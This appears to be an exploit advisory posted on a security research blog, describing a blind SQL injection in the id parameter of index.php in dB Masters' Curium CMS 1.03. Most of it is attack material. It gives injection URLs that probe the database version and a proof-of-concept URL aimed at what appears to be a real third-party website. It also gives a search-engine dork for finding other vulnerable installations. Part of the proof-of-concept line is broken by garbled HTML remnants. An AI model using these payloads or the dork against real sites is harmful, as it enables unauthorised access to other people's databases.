dB Masters' Curium CMS 1.03 Blind SQL Injection Vuln

[o] dB Masters' Curium CMS 1.03 Blind SQL Injection Vulnerability
Software : dB Masters' Curium CMS version 1.03
Vendor : http://www.dbmasters.net/
Author : NoGe

[o] Vulnerable file
index.php

[o] Exploit
http://localhost/[path]/index.php?id=[SQL]
http://localhost/[path]/index.php?id=1 and substring(@@version,1,1)=4
http://localhost/[path]/index.php?id=1 and substring(@@version,1,1)=5

[o] Proof Of Concept
http://www.scacheerleaders.com/index.php?id=43%20and%20substring(@@version,1,1)=4 << id="43%20and%20substring(@@version,1,1)=" id="5%20and%20substring(@@version,1,1)=" id="5%20and%20substring(@@version,1,1)=" style="font-weight: bold;">

[o] Dork
"Powered by dB Masters' Curium CMS"

Research Blog

Search This Blog

LFI to RCE via access_log injection

dB Masters' Curium CMS 1.03 Blind SQL Injection Vuln

Comments